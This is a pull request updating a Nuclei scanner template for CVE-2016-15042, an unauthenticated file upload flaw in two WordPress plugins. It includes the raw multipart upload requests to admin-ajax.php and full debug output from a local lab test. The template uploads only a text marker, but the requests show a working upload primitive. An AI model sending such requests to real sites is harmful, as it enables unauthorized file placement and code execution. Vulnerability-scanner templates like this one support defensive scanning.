### PR TITLE
CVE-2016-15042: WordPress Frontend File Manager & N-Media Post Front-end Form - Unauthenticated Arbitrary File Upload

### DIFF
--- a/http/cves/2016/CVE-2016-15042.yaml
+++ b/http/cves/2016/CVE-2016-15042.yaml
@@ -1,20 +1,21 @@
 id: CVE-2016-15042
 
 info:
-  name: WordPress Plugins - Frontend File Manager < 4.0 & N-Media Post Front-end Form < 1.1 - Unauthenticated Arbitrary File Upload
+  name: WordPress Frontend File Manager < 4.0 & N‑Media Post Front‑end Form < 1.1 - Unauthenticated File Upload (AJAX)
   author: ImBIOS
   severity: critical
   description: |
-    The Frontend File Manager (versions < 4.0) and N-Media Post Front-end Form (versions < 1.1) plugins for WordPress are vulnerable to arbitrary file uploads due to missing file type validation via the nm_filemanager_upload_file and nm_postfront_upload_file AJAX actions. This allows unauthenticated attackers to upload arbitrary files, potentially leading to remote code execution.
+    Unauthenticated file upload via WordPress admin-ajax endpoints in Frontend File Manager and N‑Media Post Front‑end Form.
+    The upload handlers do not validate file types, allowing arbitrary files to be placed under the uploads area.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-15042
     - https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-front-end-file-upload-and-manager-plugin/
     - https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-post-front-end-form/
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-15042
   classification:
-    cve-id: CVE-2016-15042
-    cwe-id: CWE-434
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
+    cve-id: CVE-2016-15042
+    cwe-id: CWE-434
   metadata:
     verified: false
     max-request: 2
@@ -22,79 +23,66 @@ info:
   tags: cve,cve2016,wordpress,wp,wp-plugin,file-upload,rce,intrusive
 
 variables:
-  filename: "{{to_lower(rand_base(6))}}"
+  boundary: "WebKitFormBoundary{{md5(randstr)}}"
+  base: "{{to_lower(rand_base(6))}}"
+  filename: "{{base}}.txt"
+  marker: "{{sha1(randstr)}}"
 
 http:
   - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
+        Content-Type: multipart/form-data; boundary=----{{boundary}}
 
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
+        ------{{boundary}}
         Content-Disposition: form-data; name="action"
 
         nm_filemanager_upload_file
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
+        ------{{boundary}}
         Content-Disposition: form-data; name="name"
 
-        {{filename}}.txt
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
-        Content-Disposition: form-data; name="chunks"
-
-        1
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
-        Content-Disposition: form-data; name="chunk"
-
-        0
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
-        Content-Disposition: form-data; name="file"; filename="{{filename}}.txt"
+        {{filename}}
+        ------{{boundary}}
+        Content-Disposition: form-data; name="file"; filename="{{filename}}"
         Content-Type: text/plain
 
-        {{md5(filename)}}
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW--
+        {{marker}}
+        ------{{boundary}}--
 
     matchers:
       - type: dsl
         dsl:
           - status_code == 200
-          - regex("\\\"file_name\\\"\\s*:\\s*\\\"" + filename + "\\.txt\\\"", body)
+          - regex("\\\"file_name\\\"\\s*:\\s*\\\"" + filename + "\\\"", body)
         condition: and
 
   - raw:
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
+        Content-Type: multipart/form-data; boundary=----{{boundary}}
 
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
+        ------{{boundary}}
         Content-Disposition: form-data; name="action"
 
         nm_postfront_upload_file
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
+        ------{{boundary}}
         Content-Disposition: form-data; name="name"
 
-        {{filename}}.txt
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
-        Content-Disposition: form-data; name="chunks"
-
-        1
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
-        Content-Disposition: form-data; name="chunk"
-
-        0
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW
-        Content-Disposition: form-data; name="file"; filename="{{filename}}.txt"
+        {{filename}}
+        ------{{boundary}}
+        Content-Disposition: form-data; name="file"; filename="{{filename}}"
         Content-Type: text/plain
 
-        {{md5(filename)}}
-        ------WebKitFormBoundary7MA4YWxkTrZu0gW--
+        {{marker}}
+        ------{{boundary}}--
 
     matchers:
       - type: dsl
         dsl:
           - status_code == 200
-          - regex("\\\"file_name\\\"\\s*:\\s*\\\"" + filename + "\\.txt\\\"", body)
+          - 'contains_any(body, "\"file_name\"", "\"success\"", "\"status\"")'
         condition: and
 
 


### PR DESCRIPTION
### Template / PR Information

- Added CVE-2016-15042 Nuclei template: WordPress Frontend File Manager < 4.0 & N‑Media Post Front‑end Form < 1.1 – Unauthenticated File Upload (AJAX)
- References:
  - NVD: https://nvd.nist.gov/vuln/detail/CVE-2016-15042
  - PluginVuln (FFM): https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-front-end-file-upload-and-manager-plugin/
  - PluginVuln (N‑Media PFF): https://www.pluginvulnerabilities.com/2016/09/19/arbitrary-file-upload-vulnerability-in-n-media-post-front-end-form/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

#### Additional Details (leave it blank if not applicable)

- Docker lab for quick verification: https://github.com/ImBIOS/lab-cve-2016-15042
- Quick start:

```bash
git clone https://github.com/ImBIOS/lab-cve-2016-15042
cd lab-cve-2016-15042
./scripts/setup.sh

# Option A: download template and run locally
curl -sL "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/http/cves/2016/CVE-2016-15042.yaml" -o ./CVE-2016-15042.yaml
nuclei -t ./CVE-2016-15042.yaml -u http://localhost:8090 -debug -vv 2>&1 | tee ./debug/CVE-2016-15042-debug.txt

# Option B: use local templates repo path
nuclei -t /path/to/nuclei-templates/http/cves/2016/CVE-2016-15042.yaml -u http://localhost:8090 -debug -vv 2>&1 | tee ./debug/CVE-2016-15042-debug.txt
```

##### Debug output (full)

```text


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2016-15042] WordPress Frontend File Manager < 4.0 & N‑Media Post Front‑end Form < 1.1 - Un
authenticated File Upload (AJAX) (@imbios) [critical]

[INF] [CVE-2016-15042] Dumped HTTP request for http://localhost:8090/wp-admin/admin-ajax.php

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0
.0 Safari/537.36

Connection: close
Content-Length: 508
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6e6a7a69afdf003011f46b5680879
136

Accept-Encoding: gzip

------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136
Content-Disposition: form-data; name="action"

nm_filemanager_upload_file
------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136
Content-Disposition: form-data; name="name"

5mp5nh.txt
------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136
Content-Disposition: form-data; name="file"; filename="5mp5nh.txt"
Content-Type: text/plain

00c77040578327c3ae9a32a30386ef6c96c30a65
------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136--
[DBG] [CVE-2016-15042] Dumped HTTP response http://localhost:8090/wp-admin/admin-ajax.php

HTTP/1.1 200 OK
Connection: close
Content-Length: 54
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 03 Sep 2025 08:56:05 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 03 Sep 2025 08:56:05 GMT
Pragma: no-cache
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.54 (Debian)
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.33
X-Robots-Tag: noindex

{"file_name":"5mp5nh.txt","file_w":"na","file_h":"na"}
[CVE-2016-15042:dsl-1] [http] [critical] http://localhost:8090/wp-admin/admin-ajax.php
[INF] [CVE-2016-15042] Dumped HTTP request for http://localhost:8090/wp-admin/admin-ajax.php

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8090
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Connection: close
Content-Length: 506
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6e6a7a69afdf003011f46b5680879
136

Accept-Encoding: gzip

------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136
Content-Disposition: form-data; name="action"

nm_postfront_upload_file
------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136
Content-Disposition: form-data; name="name"

5mp5nh.txt
------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136
Content-Disposition: form-data; name="file"; filename="5mp5nh.txt"
Content-Type: text/plain

00c77040578327c3ae9a32a30386ef6c96c30a65
------WebKitFormBoundary6e6a7a69afdf003011f46b5680879136--
[DBG] [CVE-2016-15042] Dumped HTTP response http://localhost:8090/wp-admin/admin-ajax.php

HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 1
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
Date: Wed, 03 Sep 2025 08:56:05 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Referrer-Policy: strict-origin-when-cross-origin
Server: Apache/2.4.54 (Debian)
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.33
X-Robots-Tag: noindex

0
[INF] Scan completed in 95.539422ms. 1 matches found.
```

### Additional References:

- Nuclei Template Creation Guideline: https://nuclei.projectdiscovery.io/templating-guide/
- Nuclei Template Matcher Guideline: https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers
- Nuclei Template Contribution Guideline: https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md
- PD-Community Discord server: https://discord.gg/projectdiscovery


/claim #13075
fix #13075